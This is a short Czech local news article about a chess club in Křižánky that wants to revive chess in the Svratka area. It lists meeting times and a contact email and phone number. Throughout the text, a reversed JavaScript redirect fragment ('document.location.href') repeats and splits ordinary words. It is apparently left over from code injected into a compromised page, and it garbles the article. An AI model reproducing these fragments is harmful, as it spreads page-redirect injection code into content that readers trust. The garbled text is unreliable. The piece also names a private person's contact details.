Rainbow page separator

V Křižánkách plánují obnovit tradici šachové hry na Svratecku

Sobota, 7. září 2019

Křižánky / Klub přátel šachu v Křižánkách, který byl založen le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v dubnu, vyzývá příznivce té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hry v nedaleké Svratce, aby se zapojili do činnosti nového spolku a pomohli obnovit tradici [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sportu na Svratecku. Vítáni jsou šachisté všeho věku. Cílem je pokusit se založit a přihlásit do soutěže šachový oddíl, který ve Svratce úspěšně fungoval ještě v 60. letech minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí a jenž zanikl v roce 1968 pro nedostatek aktivních hráčů.
V Křižánkách pracuje i školní šachový kroužek, kde pod dohledem zkušených šachistů roste řada mladých hráčů, kteří již za sebou mají první úspěchy. Křižánečtí šachisté se scházejí ve středu a v sobotu, vždy od 16 do 18 hodin v tamním vzdělávacím centru. Členství v klubu je dobrovolné, stejně jako výše jednorázového ročního klubového příspěvku. Zájemci se mohou hlásit prostřednictvím e-mailu petr.nadrchal@atlas.cz či telefonního čísla 603 826 861.